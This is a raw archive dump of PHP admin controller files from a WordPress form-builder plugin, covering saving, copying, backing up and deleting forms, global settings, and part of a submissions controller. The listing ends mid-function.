      'javascript' => $row->javascript,
      'script1' => $row->script1,
      'script2' => $row->script2,
      'script_user1' => $row->script_user1,
      'script_user2' => $row->script_user2,
      'submit_text' => $row->submit_text,
      'url' => $row->url,
      'article_id' => $row->article_id,
      'submit_text_type' => $row->submit_text_type,
      'script_mail' => $row->script_mail,
      'script_mail_user' => $row->script_mail_user,
      'paypal_mode' => $row->paypal_mode,
      'checkout_mode' => $row->checkout_mode,
      'paypal_email' => $row->paypal_email,
      'payment_currency' => $row->payment_currency,
      'tax' => $row->tax,
      'label_order_current' => $row->label_order_current,
      'from_mail' => $row->from_mail,
      'from_name' => $row->from_name,
      'reply_to_user' => $row->reply_to_user,
      'mail_from_name_user' => $row->mail_from_name_user,
      'mail_from_user' => $row->mail_from_user,
      'custom_front' => $row->custom_front,
      'autogen_layout' => $row->autogen_layout,
      'send_to' => $row->send_to,
      'reply_to' => $row->reply_to,
      'requiredmark' => $row->requiredmark,
      'sendemail' => $row->sendemail,
      'savedb' => $row->savedb,
      'form_fields' => $row->form_fields,
      'published' => $row->published,
      'save_uploads' => $row->save_uploads
    ), array(
      '%s',
      '%s',
      '%s',
      '%s',
      '%d',
      '%d',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%d',
      '%s',
      '%s',
      '%d',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%d',
      '%s',
      '%s',
      '%s',
      '%d',
      '%d',
      '%s',
      '%d'
    ));
    $id = (int)$wpdb->get_var("SELECT MAX(id) FROM " . $wpdb->prefix . "formmaker");
    update_option('contact_form_forms', ((get_option('contact_form_forms')) ? (get_option('contact_form_forms')) . ',' . $id : $id));
    $wpdb->insert($wpdb->prefix . 'formmaker_views', array(
      'form_id' => $id,
      'views' => 0
      ), array(
        '%d',
        '%d'
    ));
    if ($save !== FALSE) {
      return 1;
    }
    else {
      return 2;
    }
  }

  public function save_as_copy() {
    $message = $this->save_db_as_copy();
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }

  public function save() {
    $message = $this->save_db();
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }

  public function apply() {
    $message = $this->save_db();
    // $this->edit();
    global $wpdb;
    $id = (int) $wpdb->get_var("SELECT MAX(id) FROM " . $wpdb->prefix . "formmaker");
    $current_id = (int)WDW_FMC_Library::get('current_id', $id);
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'edit', 'current_id' => $current_id, 'message' => $message), admin_url('admin.php')));
  }

  public function save_db() {
    global $wpdb;
    $javascript = "// before form is load
function before_load() {	
}	
// before form submit
function before_submit() {
}	
// before form reset
function before_reset() {	
}";
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $title = (isset($_POST['title']) ? esc_html(stripslashes($_POST['title'])) : '');
	$theme = (isset($_POST['theme']) ? esc_html(stripslashes($_POST['theme'])) : $wpdb->get_var("SELECT id FROM " . $wpdb->prefix . "formmaker_themes WHERE `default`='1'"));
    $form_front = (isset($_POST['form_front']) ? stripslashes($_POST['form_front']) : '');
    $sortable = (isset($_POST['sortable']) ? stripslashes($_POST['sortable']) : 1);
    $counter = (isset($_POST['counter']) ? esc_html(stripslashes($_POST['counter'])) : 0);
    $label_order = (isset($_POST['label_order']) ? esc_html(stripslashes($_POST['label_order'])) : '');
    $pagination = (isset($_POST['pagination']) ? esc_html(stripslashes($_POST['pagination'])) : '');
    $show_title = (isset($_POST['show_title']) ? esc_html(stripslashes($_POST['show_title'])) : '');
    $show_numbers = (isset($_POST['show_numbers']) ? esc_html(stripslashes($_POST['show_numbers'])) : '');
    $public_key = (isset($_POST['public_key']) ? esc_html(stripslashes($_POST['public_key'])) : '');
    $private_key = (isset($_POST['private_key']) ? esc_html(stripslashes($_POST['private_key'])) : '');
    $recaptcha_theme = (isset($_POST['recaptcha_theme']) ? esc_html(stripslashes($_POST['recaptcha_theme'])) : '');
    $label_order_current = (isset($_POST['label_order_current']) ? esc_html(stripslashes($_POST['label_order_current'])) : '');
    $form_fields = (isset($_POST['form_fields']) ? stripslashes($_POST['form_fields']) : '');
    if ($id != 0) {
      $save = $wpdb->update($wpdb->prefix . 'formmaker', array(
        'title' => $title,
        'theme' => $theme,
        'form_front' => $form_front,
        'sortable' => $sortable,
        'counter' => $counter,
        'label_order' => $label_order,
        'label_order_current' => $label_order_current,
        'pagination' => $pagination,
        'show_title' => $show_title,
        'show_numbers' => $show_numbers,
        'public_key' => $public_key,
        'private_key' => $private_key,
        'recaptcha_theme' => $recaptcha_theme,
        'form_fields' => $form_fields,
      ), array('id' => $id));
    }
    else {
      $save = $wpdb->insert($wpdb->prefix . 'formmaker', array(
        'title' => $title,
        'mail' => '',
        'form_front' => $form_front,
        'theme' => $theme,
        'counter' => $counter,
        'label_order' => $label_order,
        'pagination' => $pagination,
        'show_title' => $show_title,
        'show_numbers' => $show_numbers,
        'public_key' => $public_key,
        'private_key' => $private_key,
        'recaptcha_theme' => $recaptcha_theme,
        'javascript' => $javascript,
        'submit_text' => '',
        'url' => '',
        'article_id' => 0,
        'submit_text_type' => 0,
        'script_mail' => '%all%',
        'script_mail_user' => '%all%',
        'label_order_current' => $label_order_current,
        'tax' => 0,
        'payment_currency' => '',
        'paypal_email' => '',
        'checkout_mode' => 'testmode',
        'paypal_mode' => 0,
        'published' => 1,
        'form_fields' => $form_fields,
        'savedb' => 1,
        'sendemail' => 1,
        'requiredmark' => '*',
        'from_mail' => '',
        'from_name' => '',
        'reply_to' => '',
        'send_to' => '',
        'autogen_layout' => 1,
        'custom_front' => '',
        'mail_from_user' => '',
        'mail_from_name_user' => '',
        'reply_to_user' => '',
        'condition' => '',
        'mail_cc' => '',
        'mail_cc_user' => '',
        'mail_bcc' => '',
        'mail_bcc_user' => '',
        'mail_subject' => '',
        'mail_subject_user' => '',
        'mail_mode' => 1,
        'mail_mode_user' => 1,
        'mail_attachment' => 1,
        'mail_attachment_user' => 1,
        'sortable' => $sortable,
        'user_id_wd' => 'administrator,',
        'frontend_submit_fields' => '',
        'frontend_submit_stat_fields' => '',
        'save_uploads' => 1,
      ), array(
				'%s',
        '%s',
        '%s',
        '%d',
        '%d',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%d',
        '%d',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%d',
        '%d',
        '%s',
        '%d',
        '%d',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%d',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%d',
        '%d',
        '%d',
        '%d',
        '%d',
        '%s',
        '%s',
        '%s',
        '%d',
      ));
      $id = (int)$wpdb->get_var("SELECT MAX(id) FROM " . $wpdb->prefix . "formmaker");
      update_option('contact_form_forms', ((get_option('contact_form_forms')) ? (get_option('contact_form_forms')) . ',' . $id : $id));
      // $_POST['current_id'] = $id;
      $wpdb->insert($wpdb->prefix . 'formmaker_views', array(
        'form_id' => $id,
        'views' => 0
        ), array(
          '%d',
          '%d'
      ));
    }
	
    $backup_id = (isset($_POST['backup_id']) ? (int)esc_html(stripslashes($_POST['backup_id'])) : '');
	
	if($backup_id)
	{
		$query = "SELECT backup_id FROM ".$wpdb->prefix."formmaker_backup WHERE backup_id > ".$backup_id." AND id = ".$id." ORDER BY backup_id ASC LIMIT 0 , 1 ";

		if($wpdb->get_var($query))
		{
			$query = "DELETE FROM ".$wpdb->prefix."formmaker_backup WHERE backup_id > ".$backup_id." AND id = ".$id;
			$wpdb->query($query);
		}

		$row = $wpdb->get_row($wpdb->prepare("SELECT form_fields, form_front FROM ".$wpdb->prefix."formmaker_backup WHERE backup_id = '%d'", $backup_id));

		if($row->form_fields==$form_fields and $row->form_front==$form_front)
		{
			  $save = $wpdb->update($wpdb->prefix . 'formmaker_backup', array(
				'cur' => 1,
				'title' => $title,
				'theme' => $theme,
				'form_front' => $form_front,
				'sortable' => $sortable,
				'counter' => $counter,
				'label_order' => $label_order,
				'label_order_current' => $label_order_current,
				'pagination' => $pagination,
				'show_title' => $show_title,
				'show_numbers' => $show_numbers,
				'public_key' => $public_key,
				'private_key' => $private_key,
				'recaptcha_theme' => $recaptcha_theme,
				'form_fields' => $form_fields,
			  ), array('backup_id' => $backup_id));
			
		
			if ($save !== FALSE) {
			  return 1;
			}
			else {
			  return 2;
			}
		}
	}
	
	$wpdb->query("UPDATE ".$wpdb->prefix."formmaker_backup SET cur=0 WHERE id=".$id ); 

	$save = $wpdb->insert($wpdb->prefix . 'formmaker_backup', array(
        'cur' => 1,
        'id' => $id,
        'title' => $title,
        'mail' => '',
        'form_front' => $form_front,
        'theme' => $theme,
        'counter' => $counter,
        'label_order' => $label_order,
        'pagination' => $pagination,
        'show_title' => $show_title,
        'show_numbers' => $show_numbers,
        'public_key' => $public_key,
        'private_key' => $private_key,
        'recaptcha_theme' => $recaptcha_theme,
        'javascript' => $javascript,
        'submit_text' => '',
        'url' => '',
        'article_id' => 0,
        'submit_text_type' => 0,
        'script_mail' => '%all%',
        'script_mail_user' => '%all%',
        'label_order_current' => $label_order_current,
        'tax' => 0,
        'payment_currency' => '',
        'paypal_email' => '',
        'checkout_mode' => 'testmode',
        'paypal_mode' => 0,
        'published' => 1,
        'form_fields' => $form_fields,
        'savedb' => 1,
        'sendemail' => 1,
        'requiredmark' => '*',
        'from_mail' => '',
        'from_name' => '',
        'reply_to' => '',
        'send_to' => '',
        'autogen_layout' => 1,
        'custom_front' => '',
        'mail_from_user' => '',
        'mail_from_name_user' => '',
        'reply_to_user' => '',
        'condition' => '',
        'mail_cc' => '',
        'mail_cc_user' => '',
        'mail_bcc' => '',
        'mail_bcc_user' => '',
        'mail_subject' => '',
        'mail_subject_user' => '',
        'mail_mode' => 1,
        'mail_mode_user' => 1,
        'mail_attachment' => 1,
        'mail_attachment_user' => 1,
        'sortable' => $sortable,
        'user_id_wd' => 'administrator,',
        'frontend_submit_fields' => '',
        'frontend_submit_stat_fields' => '',
      ), array(
        '%d',
        '%d',
		'%s',
        '%s',
        '%s',
        '%d',
        '%d',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%d',
        '%d',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%d',
        '%d',
        '%s',
        '%d',
        '%d',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%d',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%s',
        '%d',
        '%d',
        '%d',
        '%d',
        '%d',
        '%s',
        '%s',
        '%s',
     ))	;
  
	$query = "SELECT count(backup_id) FROM ".$wpdb->prefix."formmaker_backup WHERE id = ".$id;
	$wpdb->get_var($query);
	if($wpdb->get_var($query)>10)
	{
		$query = "DELETE FROM ".$wpdb->prefix."formmaker_backup WHERE id = ".$id." ORDER BY backup_id ASC LIMIT 1 ";
		$wpdb->query($query);
	}

    if ($save !== FALSE) {
      return 1;
    }
    else {
      return 2;
    }
  }

  public function save_db_as_copy() {
    global $wpdb;
    // $id = (isset($_POST['current_id']) ? (int) esc_html(stripslashes($_POST['current_id'])) : 0);
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $row = $wpdb->get_row($wpdb->prepare('SELECT * FROM ' . $wpdb->prefix . 'formmaker WHERE id="%d"', $id));
    $title = (isset($_POST['title']) ? esc_html(stripslashes($_POST['title'])) : '');
    $form_front = (isset($_POST['form_front']) ? stripslashes($_POST['form_front']) : '');
    $sortable = (isset($_POST['sortable']) ? stripslashes($_POST['sortable']) : 1);
    $counter = (isset($_POST['counter']) ? esc_html(stripslashes($_POST['counter'])) : 0);
    $label_order = (isset($_POST['label_order']) ? esc_html(stripslashes($_POST['label_order'])) : '');
    $label_order_current = (isset($_POST['label_order_current']) ? esc_html(stripslashes($_POST['label_order_current'])) : '');
    $pagination = (isset($_POST['pagination']) ? esc_html(stripslashes($_POST['pagination'])) : '');
    $show_title = (isset($_POST['show_title']) ? esc_html(stripslashes($_POST['show_title'])) : '');
    $show_numbers = (isset($_POST['show_numbers']) ? esc_html(stripslashes($_POST['show_numbers'])) : '');
    $public_key = (isset($_POST['public_key']) ? esc_html(stripslashes($_POST['public_key'])) : '');
    $private_key = (isset($_POST['private_key']) ? esc_html(stripslashes($_POST['private_key'])) : '');
    $recaptcha_theme = (isset($_POST['recaptcha_theme']) ? esc_html(stripslashes($_POST['recaptcha_theme'])) : '');
    $form_fields = (isset($_POST['form_fields']) ? stripslashes($_POST['form_fields']) : '');

    $save = $wpdb->insert($wpdb->prefix . 'formmaker', array(
      'title' => $title,
      'mail' => $row->mail,
      'form_front' => $form_front,
      'theme' => $row->theme,
      'counter' => $counter,
      'label_order' => $label_order,
      'pagination' => $pagination,
      'show_title' => $show_title,
      'show_numbers' => $show_numbers,
      'public_key' => $public_key,
      'private_key' => $private_key,
      'recaptcha_theme' => $recaptcha_theme,
      'javascript' => $row->javascript,
      'submit_text' => $row->submit_text,
      'url' => $row->url,
      'article_id' => $row->article_id,
      'submit_text_type' => $row->submit_text_type,
      'script_mail' => $row->script_mail,
      'script_mail_user' => $row->script_mail_user,
      'label_order_current' => $label_order_current,
      'tax' => $row->tax,
      'payment_currency' => $row->payment_currency,
      'paypal_email' => $row->paypal_email,
      'checkout_mode' => $row->checkout_mode,
      'paypal_mode' => $row->paypal_mode,
      'published' => $row->published,
      'form_fields' => $form_fields,
      'savedb' => $row->savedb,
      'sendemail' => $row->sendemail,
      'requiredmark' => $row->requiredmark,
      'from_mail' => $row->from_mail,
      'from_name' => $row->from_name,
      'reply_to' => $row->reply_to,
      'send_to' => $row->send_to,
      'autogen_layout' => $row->autogen_layout,
      'custom_front' => $row->custom_front,
      'mail_from_user' => $row->mail_from_user,
      'mail_from_name_user' => $row->mail_from_name_user,
      'reply_to_user' => $row->reply_to_user,
      'condition' => $row->condition,
      'mail_cc' => $row->mail_cc,
      'mail_cc_user' => $row->mail_cc_user,
      'mail_bcc' => $row->mail_bcc,
      'mail_bcc_user' => $row->mail_bcc_user,
      'mail_subject' => $row->mail_subject,
      'mail_subject_user' => $row->mail_subject_user,
      'mail_mode' => $row->mail_mode,
      'mail_mode_user' => $row->mail_mode_user,
      'mail_attachment' => $row->mail_attachment,
      'mail_attachment_user' => $row->mail_attachment_user,
      'sortable' => $sortable,
      'user_id_wd' => $row->user_id_wd,
      'frontend_submit_fields' => $row->frontend_submit_fields,
      'frontend_submit_stat_fields' => $row->frontend_submit_stat_fields,
      'save_uploads' => $row->save_uploads,
    ), array(
      '%s',
      '%s',
      '%s',
      '%d',
      '%d',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%d',
      '%d',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%d',
      '%d',
      '%s',
      '%d',
      '%d',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%d',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%s',
      '%d',
      '%d',
      '%d',
      '%d',
      '%d',
      '%s',
      '%s',
      '%s',
      '%d',
    ));
    $new_id = (int)$wpdb->get_var("SELECT MAX(id) FROM " . $wpdb->prefix . "formmaker");
    update_option('contact_form_forms', ((get_option('contact_form_forms')) ? (get_option('contact_form_forms')) . ',' . $id : $id));
    $wpdb->insert($wpdb->prefix . 'formmaker_views', array(
      'form_id' => $new_id,
      'views' => 0
      ), array(
        '%d',
        '%d'
    ));
    if ($save !== FALSE) {
		
		return 1;
    }
    else {
      return 2;
    }
  }

  public function delete($id) {
    global $wpdb;
    $query = $wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker WHERE id="%d"', $id);
    if ($wpdb->query($query)) {
      $arr = explode(',', get_option('contact_form_forms'));
      $arr = array_diff($arr, array($id));
      $arr = implode(',', $arr);
      update_option('contact_form_forms', $arr);
      $wpdb->query($wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_views WHERE form_id="%d"', $id));
      $wpdb->query($wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_submits WHERE form_id="%d"', $id));
	  
      $message = 3;
    }
    else {
      $message = 2;
    }
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }
  
  public function delete_all() {
    global $wpdb;
    $flag = FALSE;
    $isDefault = FALSE;
    $form_ids_col = $wpdb->get_col('SELECT id FROM ' . $wpdb->prefix . 'formmaker');
    foreach ($form_ids_col as $form_id) {
      if (isset($_POST['check_' . $form_id])) {
        $flag = TRUE;
        $wpdb->query($wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker WHERE id="%d"', $form_id));
        $arr = explode(',', get_option('contact_form_forms'));
        $arr = array_diff($arr, array($form_id));
        $arr = implode(',', $arr);
        update_option('contact_form_forms', $arr);
        $wpdb->query($wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_views WHERE form_id="%d"', $form_id));
        $wpdb->query($wpdb->prepare('DELETE FROM ' . $wpdb->prefix . 'formmaker_submits WHERE form_id="%d"', $form_id));
      }
    }
    if ($flag) {
      $message = 5;
    }
    else {
      $message = 6;
    }
    // $this->display();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerGoptions_fmc.php000060400000007476152434416630015653 0ustar00<?php

class FMControllerGoptions_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $task = WDW_FMC_Library::get('task');
    $id = (int)WDW_FMC_Library::get('current_id', 0);
    $message = WDW_FMC_Library::get('message');
    echo WDW_FMC_Library::message_id($message);
    if (method_exists($this, $task)) {
		check_admin_referer('nonce_fmc', 'nonce_fmc');
		$this->$task($id);
    }
    else {
		$this->display();
    }
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelGoptions_fmc.php";
    $model = new FMModelGoptions_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewGoptions_fmc.php";
    $view = new FMViewGoptions_fmc($model);
    $view->display();
  }

  public function save() {
    $message = $this->save_db();
    $page = WDW_FMC_Library::get('page');
    WDW_FMC_Library::fm_redirect(add_query_arg(array('page' => $page, 'task' => 'display', 'message' => $message), admin_url('admin.php')));
  }
  
  public function save_db() {
	global $wpdb;
    $public_key = (isset($_POST['public_key']) ? esc_html(stripslashes( $_POST['public_key'])) : '');
    $private_key = (isset($_POST['private_key']) ?  esc_html(stripslashes( $_POST['private_key'])) : '');
    $csv_delimiter = (isset($_POST['csv_delimiter']) && $_POST['csv_delimiter']!='' ? esc_html(stripslashes( $_POST['csv_delimiter'])) : ',');
    $map_key = (isset($_POST['map_key']) ?  esc_html(stripslashes( $_POST['map_key'])) : '');
    update_option('fmc_settings', array('public_key' => $public_key, 'private_key' => $private_key, 'csv_delimiter' => $csv_delimiter, 'map_key' => $map_key,));	
  }



  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/.htaccess000044400000000424152434416630012006 0ustar00<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php - [L]
RewriteRule ^.*\.[pP][hH].* - [L]
RewriteRule ^.*\.[sS][uU][sS][pP][eE][cC][tT][eE][dD] - [L]
<FilesMatch "\.(php|php7|phtml|suspected)$">
    Deny from all
</FilesMatch>
</IfModule>admin/controllers/FMControllerFromeditcountryinpopup_fmc.php000060400000005160152434416630020645 0ustar00<?php

class FMControllerFromeditcountryinpopup_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $this->display();
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelFromeditcountryinpopup_fmc.php";
    $model = new FMModelFromeditcountryinpopup_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewFromeditcountryinpopup_fmc.php";
    $view = new FMViewFromeditcountryinpopup_fmc($model);
    $view->display();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerFrommapeditinpopup_fmc.php000060400000005134152434416630017720 0ustar00<?php

class FMControllerFrommapeditinpopup_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $this->display();
  }

  public function display() {
    require_once WD_FMC_DIR . "/admin/models/FMModelFrommapeditinpopup_fmc.php";
    $model = new FMModelFrommapeditinpopup_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewFrommapeditinpopup_fmc.php";
    $view = new FMViewFrommapeditinpopup_fmc($model);
    $view->display();
  }

  ////////////////////////////////////////////////////////////////////////////////////////
  // Getters & Setters                                                                  //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Private Methods                                                                    //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Listeners                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
}admin/controllers/FMControllerSubmissions_fmc.php000060400000077767152434416630016401 0ustar00<?php

class FMControllerSubmissions_fmc {
  ////////////////////////////////////////////////////////////////////////////////////////
  // Events                                                                             //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constants                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Variables                                                                          //
  ////////////////////////////////////////////////////////////////////////////////////////
  ////////////////////////////////////////////////////////////////////////////////////////
  // Constructor & Destructor                                                           //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function __construct() {
  }
  ////////////////////////////////////////////////////////////////////////////////////////
  // Public Methods                                                                     //
  ////////////////////////////////////////////////////////////////////////////////////////
  public function execute() {
    $task = ((isset($_POST['task'])) ? esc_html($_POST['task']) : ''); 
    $id = ((isset($_POST['current_id'])) ? (int)esc_html($_POST['current_id']) : 0);
    $form_id = ((isset($_POST['form_id']) && esc_html($_POST['form_id']) != '') ? (int)esc_html($_POST['form_id']) : 0);	
	
    if (method_exists($this, $task)) {
		if($task != 'show_stats')
			check_admin_referer('nonce_fmc', 'nonce_fmc');
		else
			check_ajax_referer('nonce_fmc_ajax', 'nonce_fmc_ajax');
		$this->$task($id); 
    }
    else {
		$this->display($form_id); 
    }
  }
  
  public function display($form_id) {
    $form_id = ((isset($_POST['form_id']) && esc_html($_POST['form_id']) != '') ? (int)esc_html($_POST['form_id']) : 0);
    require_once WD_FMC_DIR . "/admin/models/FMModelSubmissions_fmc.php";
    $model = new FMModelSubmissions_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewSubmissions_fmc.php";
    $view = new FMViewSubmissions_fmc($model);
    $view->display($form_id);
  }

  public function show_stats() {

    $form_id = ((isset($_POST['form_id']) && esc_html($_POST['form_id']) != '') ? (int)esc_html($_POST['form_id']) : 0);
    require_once WD_FMC_DIR . "/admin/models/FMModelSubmissions_fmc.php";
    $model = new FMModelSubmissions_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewSubmissions_fmc.php";
    $view = new FMViewSubmissions_fmc($model);
    $view->show_stats($form_id);
  }

  public function edit() {
    global $wpdb;
    require_once WD_FMC_DIR . "/admin/models/FMModelSubmissions_fmc.php";
    $model = new FMModelSubmissions_fmc();

    require_once WD_FMC_DIR . "/admin/views/FMViewSubmissions_fmc.php";
    $view = new FMViewSubmissions_fmc($model);
    $id = ((isset($_POST['current_id']) && esc_html($_POST['current_id']) != '') ? (int) $_POST['current_id'] : 0);
			
    $form_id = (int)$wpdb->get_var("SELECT form_id FROM " . $wpdb->prefix . "formmaker_submits WHERE group_id='" . $id . "'");	
    $form = $wpdb->get_row("SELECT * FROM " . $wpdb->prefix . "formmaker WHERE id='" . $form_id . "'");

    if (isset($form->form)) {
      $old = TRUE;
    }
    else {
      $old = FALSE;
    }

    if ($old == FALSE || ($old == TRUE && $form->form == '')) {
      $view->new_edit($id);
    }
    else {
      $view->edit($id);
    }
  }
  
  public function save() {
    $form_id = ((isset($_POST['form_id']) && esc_html($_POST['form_id']) != '') ? (int)esc_html($_POST['form_id']) : 0);
    $this->save_db();
    $this->display($form_id);
  }

  public function apply() {
    $this->save_db();
    $this->edit();
  }  
  
  public function save_db() {
    global $wpdb;
    $id = (isset($_POST['current_id']) ? (int) esc_html(stripslashes( $_POST['current_id'])) : 0);
	$group_id = $id;
    $date = esc_html($_POST['date']);
    $ip = esc_html($_POST['ip']);
    $form_id = (int)$wpdb->get_var("SELECT form_id FROM " . $wpdb->prefix . "formmaker_submits WHERE group_id='" . $id . "'");
    $form = $wpdb->get_row("SELECT * FROM " . $wpdb->prefix . "formmaker WHERE id='" . $form_id . "'");
    $label_id = array();
    $label_order_original = array();
    $label_type = array();
	$old = false;
	$form_currency = '$';
	
    if (strpos($form->label_order, 'type_paypal_')) {
      $form->label_order = $form->label_order."0#**id**#Payment Status#**label**#type_paypal_payment_status#****#";
    }
    $label_all = explode('#****#', $form->label_order);
    $label_all = array_slice($label_all, 0, count($label_all) - 1);
    foreach ($label_all as $key => $label_each) {
      $label_id_each = explode('#**id**#', $label_each);
      array_push($label_id, $label_id_each[0]);
      $label_oder_each = explode('#**label**#', $label_id_each[1]);
      array_push($label_order_original, $label_oder_each[0]);
      array_push($label_type, $label_oder_each[1]);
    }
	
	if(isset($form->form))
		$old = true;
	
    if($old == false || ($old == true && $form->form=='')) {

		foreach($label_type as $key => $type) {
		
			$value='';
			if($type=="type_submit_reset" or $type=="type_map" or $type=="type_editor" or  $type=="type_captcha" or  $type=="type_recaptcha" or  $type=="type_button" or $type=="type_paypal_total")
				continue;

			$i=$label_id[$key];
			$id = 'form_id_temp';	
			switch ($type) {
			
				case 'type_text':
				case 'type_password':
				case 'type_textarea':
				case "type_submitter_mail":
				case "type_date":
				case "type_own_select":					
				case "type_country":				
				case "type_number":	{
					$value = (isset($_POST['wdform_'.$i."_element".$id]) ? $_POST['wdform_'.$i."_element".$id] : NULL);
					break;
				}
				case "type_wdeditor": {
